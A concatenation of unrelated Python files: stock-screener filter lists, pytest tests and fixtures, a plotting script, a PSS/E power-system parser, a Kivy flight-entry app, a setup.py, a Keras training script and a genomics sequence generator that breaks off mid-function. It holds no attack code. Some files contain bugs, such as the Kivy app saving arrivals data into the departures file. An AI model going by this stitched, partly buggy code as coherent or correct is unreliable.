"SMA200 crossed SMA20",
"SMA20 crossed SMA20 above",
"SMA20 crossed SMA20 below",
"SMA200 cross SMA50",
"SMA200 crossed SMA50 below",
"SMA200 crossed SMA50 above",
"SMA200 above SMA20",
"SMA200 below SMA20",
"SMA200 above SMA50",
"SMA200 below SMA50",
],
"52-Week High/Low": [
"Any",
"New High",
"New Low",
"5% or more below High",
"10% or more below High",
"15% or more below High",
"20% or more below High",
"30% or more below High",
"40% or more below High",
"50% or more below High",
"0-3% below High",
"0-5% below High",
"0-10% below High",
"5% or more above Low",
"10% or more above Low",
"15% or more above Low",
"20% or more above Low",
"30% or more above Low",
"40% or more above Low",
"50% or more above Low",
"0-3% above Low",
"0-5% above Low",
"0-10% above Low",
],
"RSI (14)": [
"Any",
"Overbought (90)",
"Overbought (80)",
"Overbought (70)",
"Overbought (6)",
"Oversold (40)",
"Oversold (30)",
"Oversold (20)",
"Oversold (10)",
"Not Overbought (<60)",
"Not Overbought (<50)",
"Not Oversold (>50)",
"Not Oversold (>40)",
],
"Change": [
"Any",
"Up",
"Up 1%",
"Up 2%",
"Up 3%",
"Up 4%",
"Up 5%",
"Up 6%",
"Up 7%",
"Up 8%",
"Up 9%",
"Up 10%",
"Up 15%",
"Up 20%",
"Down",
"Down 1%",
"Down 2%",
"Down 3%",
"Down 4%",
"Down 5%",
"Down 6%",
"Down 7%",
"Down 8%",
"Down 9%",
"Down 10%",
"Down 15%",
"Down 20%",
],
"Pattern": [
"Any",
"Horizontal S/R",
"Horizontal S/R (Strong)",
"TL Resistance",
"TL Resistance (Strong)",
"TL Support",
"TL Support (Strong)",
"Wedge Up",
"Wedge Up (Strong)",
"Wedge Down",
"Wedge Down (Strong)",
"Triangle Ascending",
"Triangle Ascending (Strong)",
"Triangle Descending",
"Triangle Descending (Strong)",
"Wedge",
"Wedge (Strong)",
"Channel Up",
"Channel Up (Strong)",
"Channel Down",
"Channel Down (Strong)",
"Channel",
"Channel (Strong)",
"Double Top",
"Double Bottom",
"Multiple Top",
"Multiple Bottom",
"Head & Shoulders",
"Head & Shoulders Inverse",
],
"Gap": [
"Any",
"Up",
"Up 1%",
"Up 2%",
"Up 3%",
"Up 4%",
"Up 5%",
"Up 6%",
"Up 7%",
"Up 8%",
"Up 9%",
"Up 10%",
"Up 15%",
"Up 20%",
"Down",
"Down 1%",
"Down 2%",
"Down 3%",
"Down 4%",
"Down 5%",
"Down 6%",
"Down 7%",
"Down 8%",
"Down 9%",
"Down 10%",
"Down 15%",
"Down 20%",
],
"Change from Open": [
"Any",
"Up",
"Up 1%",
"Up 2%",
"Up 3%",
"Up 4%",
"Up 5%",
"Up 6%",
"Up 7%",
"Up 8%",
"Up 9%",
"Up 10%",
"Up 15%",
"Up 20%",
"Down",
"Down 1%",
"Down 2%",
"Down 3%",
"Down 4%",
"Down 5%",
"Down 6%",
"Down 7%",
"Down 8%",
"Down 9%",
"Down 10%",
"Down 15%",
"Down 20%",
],
"Candlestick": [
"Any",
"Long Lower Shadow",
"Long Upper Shadow",
"Hammer",
"Inverted Hammer",
"Spinning Top White",
"Spinning Top Black",
"Doji",
"Dragonfly Doji",
"Gravestone Doji",
"Marubozu White",
"Marubozu Black",
],
}
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
"""
import pytest
from common.testexecresults import TestExecResults
from common.testresult import TestResults, TestResult
def test__ctor__test_results_not_correct_type__raises_type_error():
with pytest.raises(TypeError):
test_exec_result = TestExecResults("invalidtype")
def test__to_string__valid_test_results__creates_view_from_test_results_and_returns(mocker):
# Arrange
test_results = TestResults()
test_results.append(TestResult("test1", True, 10, []))
test_results.append(TestResult("test2", True, 10, []))
test_exec_result = TestExecResults(test_results)
mocker.patch.object(test_exec_result, 'get_ExecuteNotebookResult')
notebook_result = TestExecResults(test_results).get_ExecuteNotebookResult("", test_results)
test_exec_result.get_ExecuteNotebookResult.return_value = notebook_result
mocker.patch.object(test_exec_result.runcommand_results_view, 'add_exec_result')
mocker.patch.object(test_exec_result.runcommand_results_view, 'get_view')
test_exec_result.runcommand_results_view.get_view.return_value = "expectedview"
# Act
view = test_exec_result.to_string()
# Assert
test_exec_result.get_ExecuteNotebookResult.assert_called_once_with("", test_results)
test_exec_result.runcommand_results_view.add_exec_result.assert_called_once_with(notebook_result)
test_exec_result.runcommand_results_view.get_view.assert_called_once_with()
assert view == "expectedview"
def test__to_string__valid_test_results_run_from_notebook__creates_view_from_test_results_and_returns(mocker):
# Arrange
test_results = TestResults()
test_results.append(TestResult("test1", True, 10, []))
test_results.append(TestResult("test2", True, 10, []))
test_exec_result = TestExecResults(test_results)
# Act
view = test_exec_result.to_string()
# Assert
assert "PASSING TESTS" in view
assert "test1" in view
assert "test2" in view
def test__exit__valid_test_results__serializes_test_results_and_passes_to_dbutils_exit(mocker):
# Arrange
test_results = TestResults()
test_results.append(TestResult("test1", True, 10, []))
test_results.append(TestResult("test2", True, 10, []))
test_exec_result = TestExecResults(test_results)
mocker.patch.object(test_results, 'serialize')
serialized_data = "serializeddata"
test_results.serialize.return_value = serialized_data
dbutils_stub = DbUtilsStub()
# Act
test_exec_result.exit(dbutils_stub)
# Assert
test_results.serialize.assert_called_with()
assert True == dbutils_stub.notebook.exit_called
assert serialized_data == dbutils_stub.notebook.data_passed
class DbUtilsStub:
def __init__(self):
self.notebook = NotebookStub()
class NotebookStub():
def __init__(self):
self.exit_called = False
self.data_passed = ""
def exit(self, data):
self.exit_called = True
self.data_passed = data |
from numpy import cos, sin, sqrt, linspace as lsp, arange, reciprocal as rp
from matplotlib.pyplot import plot, polar, title, show
from math import pi as π
##Polar square... and byenary 100 all!
θ, ρ = lsp(0, π/0b100, 0b10), π/0o10 # ... or for octoplus!
r = rp(cos(θ))
for θ in (θ + n*π/0b10 for n in range(4)):
_ = polar(θ + ρ, r, θ + (π/0b100 + ρ), r[::-1])
_ = title('Polar square'), show()
#Polygon circle...
x = lsp(0, sqrt(0b10)/0b10, 0x10) # Hexadecaphilia!
y = sqrt(1 - x**0b10)
for x, y in ((x, y), (x, -y), (-x, -y), (-x, y)):
_ = plot(x, y, y, x)
_ = title('Polygon circle'), show()
### https://en.wikipedia.org/wiki/Parametric_equation#Some_sophisticated_functions |
"""PSS/E file parser"""
import re
from ..consts import deg2rad
from ..utils.math import to_number
import logging
logger = logging.getLogger(__name__)
def testlines(fid):
"""Check the raw file for frequency base"""
first = fid.readline()
first = first.strip().split('/')
first = first[0].split(',')
if float(first[5]) == 50.0 or float(first[5]) == 60.0:
return True
else:
return False
def read(file, system):
"""read PSS/E RAW file v32 format"""
blocks = [
'bus', 'load', 'fshunt', 'gen', 'branch', 'transf', 'area',
'twotermdc', 'vscdc', 'impedcorr', 'mtdc', 'msline', 'zone',
'interarea', 'owner', 'facts', 'swshunt', 'gne', 'Q'
]
nol = [1, 1, 1, 1, 1, 4, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0]
rawd = re.compile('rawd\d\d')
retval = True
version = 0
b = 0 # current block index
raw = {}
for item in blocks:
raw[item] = []
data = []
mdata = [] # multi-line data
mline = 0 # line counter for multi-line models
# parse file into raw with to_number conversions
fid = open(file, 'r')
for num, line in enumerate(fid.readlines()):
line = line.strip()
if num == 0: # get basemva and frequency
data = line.split('/')[0]
data = data.split(',')
mva = float(data[1])
system.config.mva = mva
system.config.freq = float(data[5])
version = int(data[2])
if not version:
version = int(rawd.search(line).group(0).strip('rawd'))
if version < 32 or version > 33:
logger.warning(
'RAW file version is not 32 or 33. Error may occur.')
continue
elif num == 1: # store the case info line
logger.info(line)
continue
elif num == 2:
continue
elif num >= 3:
if line[0:2] == '0 ' or line[0:3] == ' 0 ': # end of block
b += 1
continue
elif line[0] == 'Q': # end of file
break
data = line.split(',')
data = [to_number(item) for item in data]
mdata.append(data)
mline += 1
if mline >= nol[b]:
if nol[b] == 1:
mdata = mdata[0]
raw[blocks[b]].append(mdata)
mdata = []
mline = 0
fid.close()
# add device elements to system
sw = {} # idx:a0
for data in raw['bus']:
"""version 32:
0, 1, 2, 3, 4, 5, 6, 7, 8
ID, NAME, BasekV, Type, Area Zone Owner Va, Vm
"""
idx = data[0]
ty = data[3]
a0 = data[8] * deg2rad
if ty == 3:
sw[idx] = a0
param = {
'idx': idx,
'name': data[1],
'Vn': data[2],
'voltage': data[7],
'angle': a0,
'area': data[4],
'zone': data[5],
'owner': data[6],
}
system.Bus.elem_add(**param)
for data in raw['load']:
"""version 32:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
Bus, Id, Status, Area, Zone, PL(MW), QL (MW), IP, IQ, YP, YQ, OWNER
"""
bus = data[0]
vn = system.Bus.get_field('Vn', bus)
voltage = system.Bus.get_field('voltage', bus)
param = {
'bus': bus,
'Vn': vn,
'Sn': mva,
'p': (data[5] + data[7] * voltage + data[9] * voltage**2) / mva,
'q': (data[6] + data[8] * voltage - data[10] * voltage**2) / mva,
'owner': data[11],
}
system.PQ.elem_add(**param)
for data in raw['fshunt']:
"""
0, 1, 2, 3, 4
Bus, name, Status, g (MW), b (Mvar)
"""
bus = data[0]
vn = system.Bus.get_field('Vn', bus)
param = {
'bus': bus,
'Vn': vn,
'u': data[2],
'Sn': mva,
'g': data[3] / mva,
'b': data[4] / mva,
}
system.Shunt.elem_add(**param)
gen_idx = 0
for data in raw['gen']:
"""
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11, 12, 13, 14, 15, 16,17,18,19
I,ID,PG,QG,QT,QB,VS,IREG,MBASE,ZR,ZX,RT,XT,GTAP,STAT,RMPCT,PT,PB,O1,F1
"""
bus = data[0]
vn = system.Bus.get_field('Vn', bus)
gen_mva = data[8] # unused yet
gen_idx += 1
status = data[14]
param = {
'Sn': gen_mva,
'Vn': vn,
'u': status,
'idx': gen_idx,
'bus': bus,
'pg': status * data[2] / mva,
'qg': status * data[3] / mva,
'qmax': data[4] / mva,
'qmin': data[5] / mva,
'v0': data[6],
'ra': data[9], # ra armature resistance
'xs': data[10], # xs synchronous reactance
'pmax': data[16] / mva,
'pmin': data[17] / mva,
}
if data[0] in sw.keys():
param.update({
'a0': sw[data[0]],
})
system.SW.elem_add(**param)
else:
system.PV.elem_add(**param)
for data in raw['branch']:
"""
I,J,CKT,R,X,B,RATEA,RATEB,RATEC,GI,BI,GJ,BJ,ST,LEN,O1,F1,...,O4,F4
"""
param = {
'bus1': data[0],
'bus2': data[1],
'r': data[3],
'x': data[4],
'b': data[5],
'rate_a': data[6],
'Vn': system.Bus.get_field('Vn', data[0]),
'Vn2': system.Bus.get_field('Vn', data[1]),
}
system.Line.elem_add(**param)
for data in raw['transf']:
"""
I,J,K,CKT,CW,CZ,CM,MAG1,MAG2,NMETR,'NAME',STAT,O1,F1,...,O4,F4
R1-2,X1-2,SBASE1-2
WINDV1,NOMV1,ANG1,RATA1,RATB1,RATC1,COD1,CONT1,RMA1,RMI1,VMA1,VMI1,NTP1,TAB1,CR1,CX1
WINDV2,NOMV2
"""
if len(data[1]) < 5:
ty = 2
else:
ty = 3
if ty == 3:
raise NotImplementedError(
'Three-winding transformer not implemented')
tap = data[2][0]
phi = data[2][2]
if tap == 1 and phi == 0:
trasf = False
else:
trasf = True
param = {
'trasf': trasf,
'bus1': data[0][0],
'bus2': data[0][1],
'u': data[0][11],
'b': data[0][8],
'r': data[1][0],
'x': data[1][1],
'tap': tap,
'phi': phi,
'rate_a': data[2][3],
'Vn': system.Bus.get_field('Vn', data[0][0]),
'Vn2': system.Bus.get_field('Vn', data[0][1]),
}
system.Line.elem_add(**param)
for data in raw['swshunt']:
# I, MODSW, ADJM, STAT, VSWHI, VSWLO, SWREM, RMPCT, ’RMIDNT’,
# BINIT, N1, B1, N2, B2, ... N8, B8
bus = data[0]
vn = system.Bus.get_field('Vn', bus)
param = {
'bus': bus,
'Vn': vn,
'Sn': mva,
'u': data[3],
'b': data[9] / mva,
}
system.Shunt.elem_add(**param)
for data in raw['area']:
"""ID, ISW, PDES, PTOL, ARNAME"""
param = {
'idx': data[0],
'isw': data[1],
'pdes': data[2],
'ptol': data[3],
'name': data[4],
}
system.Area.elem_add(**param)
for data in raw['zone']:
"""ID, NAME"""
param = {
'idx': data[0],
'name': data[1],
}
system.Zone.elem_add(**param)
return retval
def readadd(file, system):
"""read DYR file"""
dyr = {}
data = []
end = 0
retval = True
sep = ','
fid = open(file, 'r')
for line in fid.readlines():
if line.find('/') >= 0:
line = line.split('/')[0]
end = 1
if line.find(',') >= 0: # mixed comma and space splitter not allowed
line = [to_number(item.strip()) for item in line.split(sep)]
else:
line = [to_number(item.strip()) for item in line.split()]
if not line:
end = 0
continue
data.extend(line)
if end == 1:
field = data[1]
if field not in dyr.keys():
dyr[field] = []
dyr[field].append(data)
end = 0
data = []
fid.close()
# elem_add device elements to system
supported = [
'GENROU',
'GENCLS',
'ESST3A',
'ESDC2A',
'SEXS',
'EXST1',
'ST2CUT',
'IEEEST',
'TGOV1',
]
used = list(supported)
for model in supported:
if model not in dyr.keys():
used.remove(model)
continue
for data in dyr[model]:
add_dyn(system, model, data)
needed = list(dyr.keys())
for i in supported:
if i in needed:
needed.remove(i)
logger.warning('Models currently unsupported: {}'.format(
', '.join(needed)))
return retval
def add_dyn(system, model, data):
"""helper function to elem_add a device element to system"""
if model == 'GENCLS':
bus = data[0]
data = data[3:]
if bus in system.PV.bus:
dev = 'PV'
gen_idx = system.PV.idx[system.PV.bus.index(bus)]
elif bus in system.SW.bus:
dev = 'SW'
gen_idx = system.SW.idx[system.SW.bus.index(bus)]
else:
raise KeyError
# todo: check xl
idx_PV = get_idx(system, 'StaticGen', 'bus', bus)
u = get_param(system, 'StaticGen', 'u', idx_PV)
param = {
'bus': bus,
'gen': gen_idx,
# 'idx': bus,
# use `bus` for `idx`. Only one generator allowed on each bus
'Sn': system.__dict__[dev].get_field('Sn', gen_idx),
'Vn': system.__dict__[dev].get_field('Vn', gen_idx),
'xd1': system.__dict__[dev].get_field('xs', gen_idx),
'ra': system.__dict__[dev].get_field('ra', gen_idx),
'M': 2 * data[0],
'D': data[1],
'u': u,
}
system.Syn2.elem_add(**param)
elif model == 'GENROU':
bus = data[0]
data = data[3:]
if bus in system.PV.bus:
dev = 'PV'
gen_idx = system.PV.idx[system.PV.bus.index(bus)]
elif bus in system.SW.bus:
dev = 'SW'
gen_idx = system.SW.idx[system.SW.bus.index(bus)]
else:
raise KeyError
idx_PV = get_idx(system, 'StaticGen', 'bus', bus)
u = get_param(system, 'StaticGen', 'u', idx_PV)
param = {
'bus': bus,
'gen': gen_idx,
# 'idx': bus,
# use `bus` for `idx`. Only one generator allowed on each bus
'Sn': system.__dict__[dev].get_field('Sn', gen_idx),
'Vn': system.__dict__[dev].get_field('Vn', gen_idx),
'ra': system.__dict__[dev].get_field('ra', gen_idx),
'Td10': data[0],
'Td20': data[1],
'Tq10': data[2],
'Tq20': data[3],
'M': 2 * data[4],
'D': data[5],
'xd': data[6],
'xq': data[7],
'xd1': data[8],
'xq1': data[9],
'xd2': data[10],
'xq2': data[10], # xd2 = xq2
'xl': data[11],
'u': u,
}
system.Syn6a.elem_add(**param)
elif model == 'ESST3A':
bus = data[0]
data = data[3:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
param = {
'syn': syn,
'vrmax': data[8],
'vrmin': data[9],
'Ka': data[6],
'Ta': data[7],
'Tf': data[5],
'Tr': data[0],
'Kf': data[5],
'Ke': 1,
'Te': 1,
}
system.AVR1.elem_add(**param)
elif model == 'ESDC2A':
bus = data[0]
data = data[3:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
param = {
'syn': syn,
'vrmax': data[5],
'vrmin': data[6],
'Ka': data[1],
'Ta': data[2],
'Tf': data[10],
'Tr': data[0],
'Kf': data[9],
'Ke': 1,
'Te': data[8],
}
system.AVR1.elem_add(**param)
elif model == 'EXST1':
bus = data[0]
data = data[3:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
param = {
'syn': syn,
'vrmax': data[7],
'vrmin': data[8],
'Ka': data[5],
'Ta': data[6],
'Kf': data[10],
'Tf': data[11],
'Tr': data[0],
'Te': data[4],
}
system.AVR1.elem_add(**param)
elif model == 'SEXS':
bus = data[0]
data = data[3:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
param = {
'syn': syn,
'vrmax': data[5],
'vrmin': data[4],
'K0': data[2],
'T2': data[1],
'T1': data[0],
'Te': data[3],
}
system.AVR3.elem_add(**param)
elif model == 'IEEEG1':
bus = data[0]
data = data[3:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
pass
elif model == 'TGOV1':
bus = data[0]
data = data[3:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
param = {
'gen': syn,
'R': data[0],
'T1': data[4],
'T2': data[5],
}
system.TG2.elem_add(**param)
elif model == 'ST2CUT':
bus = data[0]
data = data[3:]
Ic1 = data[0]
Ic2 = data[2]
data = data[4:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
avr = get_idx(system, 'AVR', 'syn', syn)
param = {
'avr': avr,
'Ic1': Ic1,
'Ic2': Ic2,
'K1': data[0],
'K2': data[1],
'T1': data[2],
'T2': data[3],
'T3': data[4],
'T4': data[5],
'T5': data[6],
'T6': data[7],
'T7': data[8],
'T8': data[9],
'T9': data[10],
'T10': data[11],
'lsmax': data[12],
'lsmin': data[13],
'vcu': data[14],
'vcl': data[15],
}
system.PSS1.elem_add(**param)
elif model == 'IEEEST':
bus = data[0]
data = data[3:]
Ic = data[0]
data = data[2:]
syn = get_idx(system, 'Synchronous', 'bus', bus)
avr = get_idx(system, 'AVR', 'syn', syn)
param = {
'avr': avr,
'Ic': Ic,
'A1': data[0],
'A2': data[1],
'A3': data[2],
'A4': data[3],
'A5': data[4],
'A6': data[5],
'T1': data[6],
'T2': data[7],
'T3': data[8],
'T4': data[9],
'T5': data[10],
'T6': data[11],
'Ks': data[12],
'lsmax': data[13],
'lsmin': data[14],
'vcu': data[15],
'vcl': data[16],
}
system.PSS2.elem_add(**param)
else:
logger.warning('Skipping unsupported model <{}> on bus {}'.format(
model, data[0]))
def get_idx(system, group, param, fkey):
ret = None
for key, item in system.devman.group.items():
if key != group:
continue
for name, dev in item.items():
int_id = system.__dict__[dev].uid[name]
if system.__dict__[dev].__dict__[param][int_id] == fkey:
ret = name
break
return ret
def get_param(system, group, param, fkey):
ret = None
for key, item in system.devman.group.items():
if key != group:
continue
for name, dev in item.items():
if name == fkey:
int_id = system.__dict__[dev].uid[name]
ret = system.__dict__[dev].__dict__[param][int_id]
return ret
|
from typing import Union
from pathlib import Path
from PIL import Image
def verifyTruncated(path: Union[str, Path]) -> bool:
try:
with Image.open(path) as image:
image.verify()
if image.format is None:
return False
return True
except (IOError, OSError):
return False
|
import os
import flask
flask.cli.load_dotenv()
os.environ["DATABASE_URL"] = "sqlite:///:memory:"
import pytest
from offstream import db
from offstream.app import app
@pytest.fixture
def setup_db():
db.Base.metadata.create_all(db.engine)
yield
db.Base.metadata.drop_all(db.engine)
@pytest.fixture
def session():
with db.Session() as session:
yield session
@pytest.fixture
def client(setup_db):
app.testing = True
with app.test_client() as client:
yield client
@pytest.fixture
def runner(setup_db):
return app.test_cli_runner()
@pytest.fixture
def settings(session):
settings, password = db.settings(ping_url="https://example.org/")
session.add(settings)
session.commit()
return settings, password
@pytest.fixture
def auth(settings):
settings_, password = settings
return settings_.username, password
@pytest.fixture
def streamer(session, setup_db):
streamer_ = db.Streamer(name="x")
session.add(streamer_)
session.commit()
return streamer_
@pytest.fixture
def stream(streamer, session):
stream_ = db.Stream(url="https://example.org/", streamer=streamer)
session.add(stream_)
session.commit()
return stream_
@pytest.fixture(params=[None, ("offstream", ""), ("offstream", "wrong")])
def bad_auth(request):
return request.param
@pytest.fixture
def m3u8(tmpdir):
return tmpdir / "playlist.m3u8"
|
from .convert import Converter
from .register import register
__all__ = [
'Converter',
'register'
]
|
import json
import os
from kivy.app import App
from kivy.config import Config
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.button import Button
class planeFinder(App):
def build(self):
self.title = 'Plane Finder' # Titre de la fenêtre
grid = GridLayout(cols=2) # On veut un layout style grille avec 2 colonnes
self.ROOT = os.path.abspath(os.getcwd()) # retourne le dossier où se trouve ce fichier
# Déclaration des boutons, labels et champs de texte
self.arrival = ToggleButton(text='Arrival', group='type', state='down')
self.departure = ToggleButton(text='Departure', group='type')
self.flight = TextInput(multiline=False)
self.carrier = TextInput(id='carrier', multiline=False)
self.destination = TextInput(id='dest', multiline=False)
self.time = TextInput(id='time', multiline=False)
self.codeshare = TextInput(id='codeshare', multiline=False)
self.button = Button(text='Enter')
self.button.bind(on_press=self.addFlight)
self.confirm = Label(text='[color=90EE90]Enter a flight to be added to the database[/color]', markup=True)
# Ajout des boutons, labels etc dans la grille d'interface graphique
grid.add_widget(self.arrival)
grid.add_widget(self.departure)
grid.add_widget(Label(text='Flight'))
grid.add_widget(self.flight)
grid.add_widget(Label(text='Carrier'))
grid.add_widget(self.carrier)
grid.add_widget(Label(text='Destination'))
grid.add_widget(self.destination)
grid.add_widget(Label(text='Departure/arrival time'))
grid.add_widget(self.time)
grid.add_widget(Label(text='Codeshare'))
grid.add_widget(self.codeshare)
grid.add_widget(self.confirm)
grid.add_widget(self.button)
return grid
# Fonction qui va modifier la BDD
def addFlight(self, *kwargs):
# On ouvre la BDD
self.departures = self.openDepartures()
self.arrivals = self.openArrivals()
# Ajout des champs de texte dans un nouveau dictionnare qui va ensuite être ajouté à la liste des vols dans la BDD
newFlight = {}
newFlight['Flight'] = self.flight.text
newFlight['Carrier'] = self.carrier.text
newFlight['Destination'] = self.destination.text
newFlight['Codeshare'] = self.codeshare.text
# On décide dans quelle base de donnée sauvegarder en fonction de quel bouton à été enfoncé
if self.arrival.state == 'down':
newFlight['Arrival Time'] = self.time.text
self.arrivals.append(newFlight)
try:
with open(os.path.join(self.ROOT, 'static/arrivals.json'), 'w') as arrivals_file:
json.dump(self.arrivals, arrivals_file, indent=4)
# Changement du texte pour confirmer la sauvegarde
self.confirm.text = '[color=90EE90]Flight added to the database[/color]'
self.eraseAll() # On efface les champs de texte
except:
self.confirm.text = '[color=f44336]Error while saving database[/color]'
else:
newFlight['Departure Time'] = self.time.text
self.departures.append(newFlight)
try:
with open(os.path.join(self.ROOT, 'static/departures.json'), 'w') as departures_file:
json.dump(self.arrivals, departures_file, indent=4)
self.confirm.text = '[color=90EE90]Flight added to the database[/color]'
self.eraseAll()
except:
self.confirm.text ='[color=f44336]Error while saving database[/color]'
# Fonction qui efface les champs de textes, utilisé après une sauvegarde
def eraseAll(self):
self.flight.text = ''
self.carrier.text = ''
self.destination.text = ''
self.time.text = ''
self.codeshare.text = ''
# Fonctions qui servent à ouvrir les BDD
def openDepartures(self):
try:
with open(os.path.join(self.ROOT, 'static/departures.json'), 'r') as departuresFile:
departures = json.load(departuresFile)
return departures
except:
print('[ERROR] Failed loading database.')
return []
def openArrivals(self):
try:
with open(os.path.join(self.ROOT, 'static/arrivals.json'), 'r') as arrivalsFile:
arrivals = json.load(arrivalsFile)
return arrivals
except:
print('[ERROR] Failed loading database.')
return []
Config.set('graphics', 'width', 550)
Config.set('graphics', 'height', 300)
planeFinder().run() # Lancement du programme
|
from __future__ import print_function, absolute_import
class MiddlewareMixin(object):
def __init__(self, get_response=None):
super(MiddlewareMixin, self).__init__()
|
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
here = os.path.abspath(os.path.dirname(__file__))
readme_path = os.path.join(here, 'README.txt')
with codecs.open(readme_path, 'r', encoding='utf-8') as file:
readme = file.read()
setup(
name='circus-env-modifier',
version='0.1.1',
description=(
"Mozilla Circus hook for modifying environment with an external"
" command."
),
long_description=readme,
classifiers=[
'Environment :: Plugins',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Intended Audience :: System Administrators',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: Apache Software License',
],
author='Mikołaj Siedlarek',
author_email='msiedlarek@nctz.net',
url='https://github.com/msiedlarek/circus-env-modifier',
keywords='mozilla circus hook environment env script command',
packages=['circus_env_modifier']
)
|
from keras.preprocessing.sequence import pad_sequences
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
import train
import predict
from config import Config
import preprocessing as prep
import numpy as np
def run():
config = Config()
save_path = "trained_model/saved_model"
x_train_path = 'data/xtrain.txt'
y_train_path = 'data/ytrain.txt'
x_idx = prep.Indexer()
X = prep.read_file(x_train_path, raw=True)
y = prep.read_file(y_train_path, label=True)
t = CountVectorizer(analyzer='char', ngram_range=(config.ngram_min, config.ngram_max))
X = np.array(
pad_sequences(
x_idx.transform(
t.inverse_transform(
t.fit_transform(X)
), matrix=True
), config.maxlen)
)
x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=config.test_size, shuffle=config.shuffle)
del X, y
# Generate batches
train_batches = prep.generate_instances(
data=x_train,
labels_data=y_train,
n_word=x_idx.max_number() + 1,
n_label=config.label_size,
max_timesteps=config.max_timesteps,
batch_size=config.batch_size)
validation_batches = prep.generate_instances(
data=x_test,
labels_data=y_test,
n_word=x_idx.max_number() + 1,
n_label=config.label_size,
max_timesteps=config.max_timesteps,
batch_size=config.batch_size)
# Train the model
train.train(config, train_batches, validation_batches, x_idx.max_number() + 1, save_path, from_saved=True)
# Final Validation
prediction_batches = prep.generate_instances(
data=x_test,
labels_data=None,
n_word=x_idx.max_number() + 1,
n_label=config.label_size,
max_timesteps=config.max_timesteps,
batch_size=config.batch_size)
# Predict the model
predicted_labels = predict.predict(config, prediction_batches, x_idx.max_number() + 1, save_path)
report = classification_report(y_test[:len(predicted_labels)], predicted_labels)
print(report)
# Final output
x_test_path = 'data/xtest.txt'
X = prep.read_file(x_test_path, raw=True)
t = CountVectorizer(analyzer='char', ngram_range=(config.ngram_min, config.ngram_max))
X = np.array(
pad_sequences(
x_idx.transform(
t.inverse_transform(
t.fit_transform(X)
), matrix=True, add_if_new=False
), config.maxlen)
)
prediction_batches = prep.generate_instances(
data=X,
labels_data=None,
n_word=x_idx.max_number() + 1,
n_label=config.label_size,
max_timesteps=config.max_timesteps,
batch_size=config.batch_size)
predicted_labels = predict.predict(config, prediction_batches, x_idx.max_number() + 1, save_path,
write_to_file=True)
if __name__ == '__main__':
run()
|
import csv
import json
import re
import sys
from collections import OrderedDict, defaultdict
import yaml
from abc import ABCMeta
from Bio import SeqIO
import itertools
from lib.proximal_variant import ProximalVariant
csv.field_size_limit(sys.maxsize)
class FastaGenerator(metaclass=ABCMeta):
def parse_proximal_variants_file(self):
if self.proximal_variants_file is not None:
proximal_variants = defaultdict(lambda: defaultdict(list))
with open(self.proximal_variants_file, 'r') as fh:
tsvin = csv.DictReader(fh, delimiter='\t')
for line in tsvin:
proximal_variants[line['main_somatic_variant']][line['protein_position']].append(line)
return proximal_variants
else:
return {}
def __init__(self, **kwargs):
self.input_file = kwargs['input_file']
self.flanking_sequence_length = kwargs['flanking_sequence_length']
self.epitope_length = kwargs['epitope_length']
self.output_file = kwargs['output_file']
self.output_key_file = kwargs['output_key_file']
self.downstream_sequence_length = kwargs.pop('downstream_sequence_length', None)
self.proximal_variants_file = kwargs.pop('proximal_variants_file', None)
self.proximal_variants = self.parse_proximal_variants_file()
def position_out_of_bounds(self, position, sequence):
return position > len(sequence)-1
#This subroutine is a bit funky but it was designed that way to mirror
#distance_from_end to increase code readability from the caller's perspective
def distance_from_start(self, position, string):
return position
def distance_from_end(self, position, string):
return len(string) - 1 - position
def get_wildtype_subsequence(self, position, full_wildtype_sequence, wildtype_amino_acid_length, line):
##clip by wt sequence length, otherwise with deletions peptide_sequence_length may exceeds full wt sequence length,
##and the code below tries extracting ranges beyond the wt sequence
peptide_sequence_length = min(2 * self.flanking_sequence_length + wildtype_amino_acid_length, len(full_wildtype_sequence))
# We want to extract a subset from full_wildtype_sequence that is
# peptide_sequence_length long so that the position ends
# up in the middle of the extracted sequence.
# If the position is too far toward the beginning or end of
# full_wildtype_sequence there aren't enough amino acids on one side
# to achieve this.
if self.distance_from_start(position, full_wildtype_sequence) < self.flanking_sequence_length:
wildtype_subsequence = full_wildtype_sequence[:peptide_sequence_length]
mutation_position = position
elif self.distance_from_end(position, full_wildtype_sequence) < self.flanking_sequence_length:
start_position = len(full_wildtype_sequence) - peptide_sequence_length
wildtype_subsequence = full_wildtype_sequence[start_position:]
mutation_position = peptide_sequence_length - self.distance_from_end(position, full_wildtype_sequence) - 1
elif self.distance_from_start(position, full_wildtype_sequence) >= self.flanking_sequence_length and self.distance_from_end(position, full_wildtype_sequence) >= self.flanking_sequence_length:
start_position = position - self.flanking_sequence_length
end_position = start_position + peptide_sequence_length
wildtype_subsequence = full_wildtype_sequence[start_position:end_position]
mutation_position = self.flanking_sequence_length
else:
sys.exit("ERROR: Something went wrong during the retrieval of the wildtype sequence at position(%s, %s, %s)" % line['chromsome_name'], line['start'], line['stop'])
return mutation_position, wildtype_subsequence
def get_frameshift_subsequences(self, position, full_wildtype_sequence, full_mutant_sequence):
if position < self.flanking_sequence_length:
start_position = 0
else:
start_position = position - self.flanking_sequence_length
wildtype_subsequence_stop_position = position + self.flanking_sequence_length
wildtype_subsequence = full_wildtype_sequence[start_position:wildtype_subsequence_stop_position]
if self.downstream_sequence_length:
mutant_subsequence_stop_position = position + self.downstream_sequence_length
mutant_subsequence = full_mutant_sequence[start_position:mutant_subsequence_stop_position]
else:
mutant_subsequence = full_mutant_sequence[start_position:]
left_flanking_sequence = full_mutant_sequence[start_position:position]
